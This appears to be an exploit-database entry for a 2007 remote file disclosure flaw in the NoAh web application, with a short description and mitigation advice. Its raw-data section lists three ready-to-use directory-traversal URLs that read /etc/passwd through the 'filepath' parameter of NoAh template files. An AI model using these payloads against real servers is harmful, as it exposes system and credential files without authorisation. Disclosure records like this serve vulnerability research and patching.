header-logo
Suggest Exploit
vendor:
NoAh
by:
S.P Thanx
7.5
CVSS
HIGH
Remote File Disclosure
CWE
Product Name: NoAh
Affected Version From: NoAh version <= 0.9 pre 1.2
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

NoAh <= 0.9 pre 1.2 (filepath) Remote File Disclosure Vulnerabilities

The NoAh version 0.9 pre 1.2 is vulnerable to remote file disclosure. This vulnerability allows an attacker to disclose sensitive files on the system by exploiting certain files in the NoAh system module templates. By manipulating the 'filepath' parameter in the URLs, an attacker can access files outside the intended directory and retrieve sensitive information such as the '/etc/passwd' file.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of NoAh or apply the necessary security measures to restrict access to sensitive files. It is also advised to review and validate user input to prevent directory traversal attacks.
Source

Exploit-DB raw data:

NoAh <= 0.9 pre 1.2 (filepath) Remote File Disclosure Vulnerabilities
Script : http://sourceforge.net/project/showfiles.php?group_id=131995  /noah0.9_pre1.2.tar.gz/
Exploits :
/noah/modules/nosystem/templates/css_file.php?filepath=../../../../../../etc/passwd
/noah/modules/nosystem/templates/js_file.php?filepath=../../../../../../etc/passwd
/noah/modules/nosystem/templates/xml_file.php?filepath=../../../../../../etc/passwd
S.P Thanx To : Tryag.Com[Mahmood_ali] -- Asb-May.Net/bb[Mahmood_ali]

# milw0rm.com [2007-11-28]

Navigation

Suggest Exploit

Services By CQR